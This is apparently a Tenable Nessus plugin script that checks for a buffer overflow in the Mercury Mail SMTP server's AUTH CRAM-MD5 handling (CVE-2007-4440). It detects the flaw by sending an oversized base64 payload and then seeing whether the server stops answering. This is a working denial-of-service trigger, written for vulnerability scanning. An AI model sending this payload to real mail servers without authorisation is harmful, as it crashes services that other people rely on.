#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote mail server is affected by a buffer overflow vulnerability. 

Description :

The remote host is running the Mercury Mail Transport System, a free
suite of server products for Windows and Netware associated with
Pegasus Mail. 

The version of Mercury Mail installed on the remote host includes an
SMTP server that is affected by a buffer overflow flaw.  Using a
specially-crafted 'AUTH CRAM-MD5' request, an unauthenticated remote
attacker can leverage this issue to crash the remote application and
even execute arbitrary code remotely, subject to the privileges under
which the application runs. 

See also :

http://www.milw0rm.com/exploits/4294
http://www.security-express.com/archives/fulldisclosure/2007-08/0341.html
http://community.pmail.com/forums/thread/3816.aspx
http://www.pmail.com/m32_451.htm

Solution :

Upgrade to Mercury/32 v4.52 or later or apply the 4.01c / 1.49
security patch. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";

if (description)
{
  script_id(25928);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-4440");
  script_bugtraq_id(25357);
  script_xref(name:"OSVDB", value:"39669");

  script_name(english:"Mercury SMTP Server AUTH CRAM-MD5 Buffer Overflow Vulnerability");
  script_summary(english:"Tries to crash the SMTP server");

  script_description(english:desc);

  script_category(ACT_DENIAL);
  script_family(english:"SMTP problems");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("smtpserver_detect.nasl");
  script_exclude_keys("SMTP/wrapped");
  script_require_ports("Services/smtp", 25);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");


port = get_kb_item("Services/smtp");
if (!port) port = 25;
if (!get_port_state(port)) exit(0);
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);


# Open a connection.
soc = smtp_open(port:port);
if (!soc) exit(0);


# If it looks like Mercury...
c = string("EHLO ", this_host_name());
send(socket:soc, data:string(c, "\r\n"));
s = smtp_recv_line(socket:soc);
if (s && "ESMTPs are:" >< s)
{
  # Try to exploit the flaw to crash the daemon.
  c = 'AUTH CRAM-MD5';
  send(socket:soc, data:string(c, "\r\n"));
  s = smtp_recv_line(socket:soc);
  if ("334 " >< s)
  {
    c = base64(str:"AAA");
    c = crap(data:c, length:strlen(c)*10000);
    send(socket:soc, data:string(c, "\r\n"));
    s = smtp_recv_line(socket:soc);
    if (strlen(s) == 0 || "Attempted buffer overflow attack detected" >!< s) 
    {
      if (strlen(s)) sleep(1);

      # There's a problem if the server is now down.
      soc2 = smtp_open(port:port);
      if (!soc2) 
      {
        security_hole(port);
        exit(0);
      }

      smtp_close(socket:soc2);
    }
  }
}


# Be nice.
smtp_close(socket:soc);
